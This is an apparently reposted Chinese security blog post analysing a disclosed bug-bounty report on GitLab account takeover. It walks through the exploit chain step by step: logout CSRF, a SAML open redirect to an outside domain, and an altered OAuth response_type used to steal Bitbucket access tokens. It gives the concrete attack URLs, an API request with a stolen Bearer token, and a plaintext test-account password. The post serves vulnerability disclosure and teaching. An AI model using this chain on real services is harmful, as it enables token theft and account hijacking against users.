文章总结： 文档分析了一起因参数未校验导致的账户劫持漏洞案例，攻击者通过LogoutCSRF配合SAML开放重定向，篡改OAuth流程中的response_type参数以窃取Bitbucket访问令牌。文章详细展示了完整的攻击利用链与复现步骤，指出该漏洞可影响多种第三方登录方式，强调了OAuth实施中严格校验参数的关键安全意义。 综合评分： 81 文章分类： 漏洞分析,渗透测试,漏洞POC,WEB安全

参数未校验所导致的账户劫持

h1 h1

迪哥讲事

2026年3月24日 10:01 四川

正文

该漏洞利用链可用于窃取用户通过 Google、GitHub、Bitbucket、Twitter、Salesforce 等第三方账号登录时的访问令牌。

我们将重点分析 Bitbucket：

受害者前提条件：

确保受害者此前已在 GitLab 中使用过 Bitbucket（无论是登录，还是导入项目）。

攻击者操作： 1.创建一个配置了 SAML 登录的群组，并配置用户通过 SAML 登录 GitLab

2.以下是用于漏洞复核的账号信息（请注意：复核完成后我会立即吊销这些凭证，如需延长使用或无需使用请告知）：

地址：https://bugcrowd-iambull-2.oktapreview.com/

用户名：[email protected]

密码：Gliatb4passtbx!

POC 执行流程

通过 Logout CSRF 让受害者退出登录 使用 SAML 凭证为受害者保存开放重定向：

https://bugcrowd-iambull-2.oktapreview.com/app/bugcrowd-iambull-2_gitlabcom_1/exk1lit3jovMjvewh0h8/sso/saml?RelayState=.witcoat.com

将 response_type 改为 对应的token，触发 Bitbucket OAuth 流程：

https://bitbucket.org/site/oauth2/authorize?client_id=b9jLmh8WCLZPBAwWba&redirect_uri=https%3A%2F%2Fgitlab.com%2Fusers%2Fauth%2Fbitbucket%2Fcallback&response_type=token&state=DoesNotMatter

尝试使用窃取到的令牌调用 Bitbucket API：

GET /2.0/repositories/%7B766210f9-9bec-4010-9f4d-917b06661c0c%7D HTTP/2
Host: api.bitbucket.orgU
ser-Agent: curl/7.79.1
Accept: /
Authorization: Bearer Txpo3AXXQZHlp....

典型的oauth流程中出现的问题所导致的账户劫持

如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款

往期回顾

#

如何利用ai辅助挖漏洞

#

如何在移动端抓包-下

#

如何绕过签名校验

#

一款bp神器

挖掘有回显ssrf的隐藏payload

ssrf绕过新思路

一个辅助测试ssrf的工具

dom-xss精选文章

年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

参考

https://hackerone.com/reports/1923672

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：迪哥讲事 h1 h1《参数未校验所导致的账户劫持》